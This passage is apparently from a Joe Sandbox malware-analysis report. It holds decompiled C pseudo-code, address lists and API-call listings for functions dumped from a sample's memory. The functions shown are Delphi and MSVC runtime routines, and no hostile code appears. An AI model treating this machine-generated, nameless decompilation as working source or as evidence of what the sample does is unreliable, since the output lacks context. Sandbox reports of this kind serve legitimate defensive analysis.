					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 030063A0, Relevance: 7.6, APIs: 5, Instructions: 116
    C-Code - Quality: 96%
    			E030063A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t47;
				signed int _t52;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				long _t64;
				LONG* _t67;
				LONG* _t73;
				intOrPtr _t89;
				intOrPtr _t97;
				void* _t98;
				void* _t101;

				_t101 = __eflags;
				_t87 = __edx;
				_push(0x14);
				_push(0x30098f8);
				E03005030(__ebx, __edi, __esi);
				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
				_t89 = E03004D40(__ebx, __edx, _t101);
				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
				E03006097(__ebx, __edx, _t89, __esi, _t101);
				_t47 = E0300613B( *((intOrPtr*)(_t98 + 8)));
				 *((intOrPtr*)(_t98 + 8)) = _t47;
				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
					_t41 = _t98 - 0x20;
					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
					__eflags =  *_t41;
					L26:
					return E03005075( *(_t98 - 0x20));
				}
				_t73 = E030068EE(0x220);
				_t103 = _t73;
				if(_t73 == 0) {
					goto L26;
				}
				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
				 *_t73 =  *_t73 & 0x00000000;
				_t52 = E030061B7(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
				 *(_t98 - 0x20) = _t52;
				if(_t52 != 0) {
					__eflags = _t52 - 0xffffffff;
					if(_t52 == 0xffffffff) {
						__eflags = _t73 - 0x300b450;
						if(_t73 != 0x300b450) {
							E03006891(_t73);
						}
						 *((intOrPtr*)(E03003EA5())) = 0x16;
					}
				} else {
					_t97 =  *((intOrPtr*)(_t98 - 0x24));
					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
						_t69 =  *(_t97 + 0x68);
						if( *(_t97 + 0x68) != 0x300b450) {
							E03006891(_t69);
						}
					}
					 *(_t97 + 0x68) = _t73;
					InterlockedIncrement(_t73);
					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x300b970 & 0x00000001) == 0) {
						E03006E8E(_t73, InterlockedIncrement, 0xd);
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						 *0x300c664 = _t73[1];
						 *0x300c668 = _t73[2];
						 *0x300c66c = _t73[3];
						_t61 = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t61;
							if(_t61 >= 5) {
								break;
							}
							 *((short*)(0x300c658 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
							_t61 = _t61 + 1;
						}
						_t62 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t62;
							__eflags = _t62 - 0x101;
							if(_t62 >= 0x101) {
								break;
							}
							 *((char*)(_t62 + 0x300b670)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
							_t62 = _t62 + 1;
						}
						_t63 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t63;
							__eflags = _t63 - 0x100;
							if(_t63 >= 0x100) {
								break;
							}
							 *((char*)(_t63 + 0x300b778)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
							_t63 = _t63 + 1;
						}
						_t64 = InterlockedDecrement( *0x300b878);
						__eflags = _t64;
						if(_t64 == 0) {
							_t67 =  *0x300b878; // 0x300b450
							__eflags = _t67 - 0x300b450;
							if(_t67 != 0x300b450) {
								E03006891(_t67);
							}
						}
						 *0x300b878 = _t73;
						InterlockedIncrement(_t73);
						 *(_t98 - 4) = 0xfffffffe;
						E03006501();
					}
				}
			}















    0x030063a0
    0x030063a0
    0x030063a0
    0x030063a2
    0x030063a7
    0x030063ac
    0x030063b5
    0x030063b7
    0x030063ba
    0x030063c5
    0x030063ca
    0x030063d0
    0x0300652d
    0x0300652d
    0x0300652d
    0x03006531
    0x03006539
    0x03006539
    0x030063e1
    0x030063e3
    0x030063e5
    0x00000000
    0x00000000
    0x030063f5
    0x030063f7
    0x030063fe
    0x03006405
    0x0300640a
    0x0300650c
    0x0300650f
    0x03006511
    0x03006517
    0x0300651a
    0x0300651f
    0x03006525
    0x03006525
    0x03006410
    0x03006410
    0x0300641e
    0x03006420
    0x03006428
    0x0300642b
    0x03006430
    0x03006428
    0x03006431
    0x0300643b
    0x03006441
    0x03006456
    0x0300645c
    0x03006463
    0x0300646b
    0x03006473
    0x03006478
    0x0300647a
    0x0300647a
    0x03006480
    0x00000000
    0x00000000
    0x03006487
    0x0300648f
    0x0300648f
    0x03006492
    0x03006492
    0x03006494
    0x03006494
    0x03006497
    0x0300649c
    0x00000000
    0x00000000
    0x030064a2
    0x030064a8
    0x030064a8
    0x030064ab
    0x030064ab
    0x030064ad
    0x030064ad
    0x030064b0
    0x030064b5
    0x00000000
    0x00000000
    0x030064be
    0x030064c4
    0x030064c4
    0x030064cd
    0x030064d3
    0x030064d5
    0x030064d7
    0x030064dc
    0x030064e1
    0x030064e4
    0x030064e9
    0x030064e1
    0x030064ea
    0x030064f1
    0x030064f3
    0x030064fa
    0x030064fa
    0x03006441

    APIs
    • __getptd.LIBCMT ref: 030063B0
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
      • Part of subcall function 03006097: __getptd.LIBCMT ref: 030060A3
      • Part of subcall function 03006097: __amsg_exit.LIBCMT ref: 030060C3
      • Part of subcall function 03006097: InterlockedDecrement.KERNEL32(?), ref: 030060F0
      • Part of subcall function 03006097: InterlockedIncrement.KERNEL32(0300B450), ref: 0300611B
      • Part of subcall function 0300613B: GetOEMCP.KERNEL32(00000000), ref: 03006164
      • Part of subcall function 0300613B: GetACP.KERNEL32(00000000), ref: 03006187
      • Part of subcall function 030068EE: Sleep.KERNEL32(00000000,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 0300690F
      • Part of subcall function 030061B7: setSBCS.LIBCMT ref: 030061E4
      • Part of subcall function 030061B7: IsValidCodePage.KERNEL32(-00000030), ref: 0300622A
      • Part of subcall function 030061B7: GetCPInfo.KERNEL32(00000000,?), ref: 0300623D
      • Part of subcall function 030061B7: setSBUpLow.LIBCMT ref: 0300632B
    • InterlockedDecrement.KERNEL32(?), ref: 03006416
    • InterlockedIncrement.KERNEL32(00000000), ref: 0300643B
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedDecrement.KERNEL32 ref: 030064CD
    • InterlockedIncrement.KERNEL32(00000000), ref: 030064F1
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 03004081, Relevance: 7.6, APIs: 5, Instructions: 98
    C-Code - Quality: 24%
    			E03004081(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				intOrPtr* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr* _t52;
				intOrPtr* _t54;
				void* _t55;
				void* _t57;

				_push(0x20);
				_push(0x3009828);
				E03005030(__ebx, __edi, __esi);
				E03006E8E(__ebx, __edi, 8);
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				_t57 =  *0x300be00 - 1; // 0x0
				if(_t57 != 0) {
					 *0x300bdfc = 1;
					_t34 =  *((intOrPtr*)(_t55 + 0x10));
					 *0x300bdf8 =  *((intOrPtr*)(_t55 + 0x10));
					if( *((intOrPtr*)(_t55 + 0xc)) == 0) {
						_t54 = __imp__DecodePointer;
						_t34 =  *_t54( *0x3013088);
						_t45 = 1;
						 *((intOrPtr*)(_t55 - 0x30)) = 1;
						if(1 != 0) {
							_t34 =  *_t54( *0x3013084);
							_t52 = 1;
							 *((intOrPtr*)(_t55 - 0x2c)) = 1;
							 *((intOrPtr*)(_t55 - 0x24)) = 1;
							 *((intOrPtr*)(_t55 - 0x28)) = 1;
							while(1) {
								_t52 = _t52 - 4;
								 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
								if(_t52 < _t45) {
									goto L11;
								}
								if( *_t52 == _t34) {
									continue;
								} else {
									if(_t52 >= _t45) {
										_t40 =  *_t54( *_t52);
										 *_t52 = E03004B90(_t40);
										 *_t40();
										_t47 =  *_t54( *0x3013088);
										_t34 =  *_t54( *0x3013084);
										if( *((intOrPtr*)(_t55 - 0x24)) != _t47 ||  *((intOrPtr*)(_t55 - 0x28)) != _t34) {
											 *((intOrPtr*)(_t55 - 0x24)) = _t47;
											 *((intOrPtr*)(_t55 - 0x30)) = _t47;
											 *((intOrPtr*)(_t55 - 0x28)) = _t34;
											_t52 = _t34;
											 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
										}
										_t45 =  *((intOrPtr*)(_t55 - 0x30));
										continue;
									}
								}
								goto L11;
							}
						}
						L11:
						 *((intOrPtr*)(_t55 - 0x1c)) = 0x3001164;
						while( *((intOrPtr*)(_t55 - 0x1c)) < 0x3001170) {
							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x1c))));
							if(_t34 != 0) {
								_t34 =  *_t34();
							}
							 *((intOrPtr*)(_t55 - 0x1c)) =  *((intOrPtr*)(_t55 - 0x1c)) + 4;
						}
					}
					 *((intOrPtr*)(_t55 - 0x20)) = 0x3001174;
					while( *((intOrPtr*)(_t55 - 0x20)) < 0x3001178) {
						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x20))));
						if(_t34 != 0) {
							_t34 =  *_t34();
						}
						 *((intOrPtr*)(_t55 - 0x20)) =  *((intOrPtr*)(_t55 - 0x20)) + 4;
					}
				}
				 *(_t55 - 4) = 0xfffffffe;
				L23();
				if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
					return E03005075(_t34);
				} else {
					 *0x300be00 = 1;
					_t36 = E03006DB5(8);
					E03003F69( *((intOrPtr*)(_t55 + 8)));
					if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
						return E03006DB5(8);
					}
					return _t36;
				}
			}











    0x03004081
    0x03004083
    0x03004088
    0x0300408f
    0x03004095
    0x0300409c
    0x030040a2
    0x030040a8
    0x030040ad
    0x030040b0
    0x030040b9
    0x030040c5
    0x030040cb
    0x030040cd
    0x030040cf
    0x030040d4
    0x030040dc
    0x030040de
    0x030040e0
    0x030040e3
    0x030040e6
    0x030040e9
    0x030040e9
    0x030040ec
    0x030040f1
    0x00000000
    0x00000000
    0x030040fa
    0x00000000
    0x030040fc
    0x030040fe
    0x03004102
    0x0300410b
    0x0300410d
    0x03004117
    0x0300411f
    0x03004124
    0x0300412b
    0x0300412e
    0x03004131
    0x03004134
    0x03004136
    0x03004136
    0x03004139
    0x00000000
    0x03004139
    0x030040fe
    0x00000000
    0x030040fa
    0x030040e9
    0x0300413e
    0x0300413e
    0x03004145
    0x03004151
    0x03004155
    0x03004157
    0x03004157
    0x03004159
    0x03004159
    0x03004145
    0x0300415f
    0x03004166
    0x03004172
    0x03004176
    0x03004178
    0x03004178
    0x0300417a
    0x0300417a
    0x03004166
    0x03004180
    0x03004187
    0x03004190
    0x030041c0
    0x03004192
    0x03004192
    0x0300419e
    0x030041a7
    0x030041b0
    0x00000000
    0x030041b9
    0x030041ba
    0x030041ba

    APIs
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • DecodePointer.KERNEL32(03009828,00000020,030041E8,?,00000001,00000000,?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 030040CB
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 030040DC
      • Part of subcall function 03004B90: EncodePointer.KERNEL32(00000000,030073D2,0300BE08,00000314,00000000,?,?,?,?,?,0300438C,0300BE08,Microsoft Visual C++ Runtime Library,00012010), ref: 03004B92
    • DecodePointer.KERNEL32(-00000004,?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 03004102
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 03004115
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 0300411F
      • Part of subcall function 03006DB5: LeaveCriticalSection.KERNEL32(?,03006E8C,0000000A,03006E7C,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 03006DC4
      • Part of subcall function 03003F69: ExitProcess.KERNEL32 ref: 03003F7A
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0300711B, Relevance: 7.6, APIs: 5, Instructions: 74
    C-Code - Quality: 21%
    			E0300711B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr _t13;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t36;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;

				_t40 = __imp__DecodePointer;
				_t11 =  *_t40( *0x3013088, _t33, _t39, _t23, _t27);
				_t24 = _t11;
				_v8 = _t24;
				_t41 =  *_t40( *0x3013084);
				if(_t41 < _t24) {
					L11:
					_t13 = 0;
				} else {
					_t36 = _t41 - _t24;
					_t2 = _t36 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t26 = E03008D8B(_t24);
						_t3 = _t36 + 4; // 0x4
						if(_t26 >= _t3) {
							L10:
							_t37 = __imp__EncodePointer;
							 *_t41 =  *_t37(_a4);
							 *0x3013084 =  *_t37(_t41 + 4);
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t26 < 0x800) {
								_t19 = _t26;
							}
							_t20 = _t19 + _t26;
							if(_t19 + _t26 < _t26) {
								L7:
								_t5 = _t26 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t26) {
									goto L11;
								} else {
									_t22 = E0300697F(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E0300697F(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t41 = _t22 + (_t36 >> 2) * 4;
									__imp__EncodePointer(_t22);
									 *0x3013088 = _t22;
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}


















    0x03007123
    0x03007130
    0x03007138
    0x0300713a
    0x0300713f
    0x03007143
    0x030071ca
    0x030071ca
    0x03007149
    0x0300714b
    0x0300714d
    0x03007153
    0x00000000
    0x03007155
    0x0300715b
    0x0300715d
    0x03007163
    0x030071ad
    0x030071b0
    0x030071b8
    0x030071c0
    0x030071c5
    0x03007165
    0x03007165
    0x0300716c
    0x0300716e
    0x0300716e
    0x03007170
    0x03007174
    0x03007185
    0x03007185
    0x03007185
    0x0300718a
    0x00000000
    0x0300718c
    0x03007190
    0x03007199
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03007199
    0x03007176
    0x0300717a
    0x03007183
    0x0300719b
    0x0300719f
    0x030071a2
    0x030071a8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03007183
    0x03007174
    0x03007163
    0x03007153
    0x030071d0

    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 03007130
    • DecodePointer.KERNEL32(?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 0300713D
      • Part of subcall function 03008D8B: HeapSize.KERNEL32(00000000,00000000,?,00000003,03006CFD,03009938,00000008,03003F2A), ref: 03008DB6
      • Part of subcall function 0300697F: Sleep.KERNEL32(00000000,00000000,00000000,?,03007195,00000000,00000010,?,?,?,?,?,0300721F,?,03009998,0000000C), ref: 030069A9
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071A2
    • EncodePointer.KERNEL32(?,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071B6
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071BE
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
